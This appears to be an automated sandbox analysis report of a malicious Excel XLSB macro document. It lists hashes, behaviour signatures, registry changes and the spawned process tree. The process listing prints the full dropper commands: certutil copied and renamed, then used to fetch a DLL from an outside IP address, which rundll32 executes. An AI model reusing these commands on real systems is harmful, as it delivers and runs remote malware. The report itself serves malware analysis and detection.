cancel_sub_VCP1234567890123.xlsb

General
Target: cancel_sub_VCP1234567890123.xlsb
Filesize: 123 KB
Completed: 10-06-2021 19:17
Score: 10/10
MD5: 9e1ee4a42c381eabcf2cde38a1aae7c9
SHA1: 015bb306d9e54001d433b3ac2e7212b864f54ae2
SHA256: fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

Malware Config
Extracted
Language: xlm4.0
Signatures (9)
Tactics observed: Defense Evasion, Discovery
  • Process spawned unexpected child process
    cmd.exe

    Description: This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    description | pid | pid_target | process | target process
    Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 892 | 332 | cmd.exe | EXCEL.EXE
    Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 412 | 332 | cmd.exe | EXCEL.EXE
  • Executes dropped EXE
    TTObk2.exe

    Reported IOCs

    pid | process
    1696 | TTObk2.exe
  • Loads dropped DLL
    EXCEL.EXE

    Reported IOCs

    pid | process
    332 | EXCEL.EXE
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs: Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
  • Modifies Internet Explorer settings
    EXCEL.EXE

    TTPs: Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar | EXCEL.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | EXCEL.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | EXCEL.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | EXCEL.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | EXCEL.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | EXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pid | process
    332 | EXCEL.EXE
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pid | process
    332 | EXCEL.EXE (reported 5 times)
  • Suspicious use of WriteProcessMemory
    EXCEL.EXE, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 332 wrote to memory of 892 | 332 | EXCEL.EXE | cmd.exe (reported 4 times)
    PID 332 wrote to memory of 1696 | 332 | EXCEL.EXE | TTObk2.exe (reported 4 times)
    PID 332 wrote to memory of 412 | 332 | EXCEL.EXE | cmd.exe (reported 4 times)
    PID 412 wrote to memory of 2036 | 412 | cmd.exe | rundll32.exe (reported 7 times)
Processes (5)
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb
    Loads dropped DLL
    Enumerates system info in registry
    Modifies Internet Explorer settings
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:332
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:892
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:1696
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:412
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2036
Network
MITRE ATT&CK Matrix
Matrix columns: Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
Downloads
  • C:\ProgramData\TTObk2\TTObk2.exe (the report lists the same file three times, as C:\ProgramData\TTObk2\TTObk2.exe, C:\programdata\TTObk2\TTObk2.exe and \ProgramData\TTObk2\TTObk2.exe, with identical hashes)
    MD5: 7b973145f7e1b59330ca4dd1f86b3d55
    SHA1: 10ce9174bff4856083e6adad0094a798ced2c079
    SHA256: 589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4
    SHA512: 1e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4

  • memory/332-59-0x000000002FD71000-0x000000002FD74000-memory.dmp
  • memory/332-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
  • memory/332-60-0x0000000071211000-0x0000000071213000-memory.dmp
  • memory/412-68-0x0000000000000000-mapping.dmp
  • memory/892-62-0x0000000000000000-mapping.dmp
  • memory/1696-65-0x0000000000000000-mapping.dmp
  • memory/1696-67-0x0000000075FF1000-0x0000000075FF3000-memory.dmp
  • memory/2036-69-0x0000000000000000-mapping.dmp